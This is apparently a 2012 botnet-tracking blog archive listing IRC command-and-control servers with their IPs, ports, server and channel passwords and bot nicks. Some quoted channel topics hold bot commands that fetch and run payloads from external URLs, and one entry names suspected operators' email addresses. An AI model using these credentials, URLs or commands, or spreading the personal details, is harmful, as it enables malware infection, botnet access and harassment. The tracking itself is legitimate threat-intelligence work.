Month: September 2012

Mystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

Uncategorized

As Mystical has now recently been banned from hackforums, I thought I would make an informative megapost of botnets he has or is currently using. Domains Bighecker.co 1212Mystic0801.info Sonic4us.com Sonic4me.com img196-imageshack.us rs-booter.com modtech360.info 307dice.com powerbot24.com img90-imageshack.com imageshells.com bighecks.net emails used for registration hlolgame@aim.com mikeydoc@hotmail.com #plug this into facebook to see his profile highroller098765@hotmail.com mikeshosting@yahoo.com bram.fadzulani@mail.comRead more...

vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

Uncategorized

Resolved vandersand.no-ip.biz to 199.115.230.138 Server: vandersand.no-ip.biz Port:  6654 Channel: #Insomnia Channel password: frosty * Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5 * Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012 Botnick: {IT|XP-32a}uwryxvf While I was in the channel he downloaded a bitcoin miner Dextermania.exe  hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924 HostingRead more...

cmjc.no-ip.biz (Athena ircbot hosted by France Roubaix Ovh Systems)

Uncategorized

Found more athena nets Resolved cmjc.no-ip.biz to 5.39.44.120 Server: cmjc.no-ip.biz Port: 6667 Channel:  #kam  #kam             14      [+smntrVCT] Channel: #vanrikki Password: wiitasauce3991 #vanrikki        44      [+sntrVCTk]  Server is one of those used by cmjc.whhcd.info I’m not sure why they used a no-ip for these bots, anyone can get that suspended easily. The servers host lots of skids,Read more...

cmjc.whhcd.info (Athena ircbot hosted by France Roubaix Ovh Systems)

Uncategorized

Resolved cmjc.whhcd.info to 5.39.44.120 Resolved cmjc.whhcd.info to 176.31.33.45 Resolved cmjc.whhcd.info to 46.105.36.229 Server: cmjc.whhcd.info Port: 6667 Channel:  #MuustaHF Channel password: hejij3cdp Opers:Ddos * [Ddos] (Ddos@I.Will.DDOS.Your.Ass): Ddos * [Ddos] is a registered nick * [Ddos] services.whhcd.info :Services for IRC Networks * [Ddos] idle 158:10:19, signon: Wed Aug 29 23:26:30 * [Ddos] End of WHOIS list. MuustaHFRead more...

gtfo.myprivatefile.com(irc botnet hosted in United States Clifton Park Search Guide Inc)

Uncategorized

Resolved : [gtfo.myprivatefile.com] To [184.106.87.139] Resolved : [gtfo.myprivatefile.com] To [66.152.109.69 13] Resolved : [gtfo.myprivatefile.com] To [69.16.143.69 13] Remote Host Port Number gtfo.myprivatefile.com 1337 PASS google_cache1tfsg4.tmp NICK X[USA][XP-SP2]150351 USER 9092 “” “lol” :9092 JOIN #swarm swarm NICK {NEW}X[USA][XP-SP2]020911 USER 0441 “” “lol” :0441 NICK X[USA][XP-SP2]075732 USER 5218 “” “lol” :5218 hosting infos: http://whois.domaintools.com/66.152.109.69

blah.swapixtreme.com(irc botnet hosted in United Kingdom Vooservers Ltd)

Uncategorized

Resolved : [blah.swapixtreme.com] To [91.227.221.217] Clients: I have 308 clients and 1 servers Local users: Current Local Users: 308 Max: 1 Global users: Current Global Users: 309 Max: 1105 Remote Host Port Number blah.swapixtreme.com 7878 NICK [GSA]-274266 USER hhzegr 0 0 :[GSA]-274266 USERHOST [GSA]-274266 MODE [GSA]-274266 +xt JOIN #b imallowed2020 hosting infos: http://whois.domaintools.com/91.227.221.217

kca.hopto.org(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Uncategorized

Resolved : [kca.hopto.org] To [88.255.116.48] Server: 88.255.116.48:1453 Nick: new[iRooT-XP-AUT]990453 Username: 9904 Server Pass: KCA Joined Channel: #XXX with Password KCA Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html” Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!” Private Message to Channel #XXX: “[Download]: Executed Successfully” Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09SpreadingRead more...

deuxexhre.org (ngrbot hosted by Romania Voxility)

Uncategorized

deuxexhre.org resolved to 37.221.160.38 Server: deuxexhre.org Port: 1090 Password: romeo Channel: ##str Channel Password: romeo Channel topic: * Topic for ##str is: *mdns http://alfonsoelpidio.com/hosts * Topic for ##str set by drek0 at Wed Aug 29 11:22:21 2012 Bot sample from http://oberheimdmx.blogspot.co.uk/2012/08/dorkbot-falso-mensaje-de-amorenlinea.html Hosting infos: http://whois.domaintools.com/37.221.160.38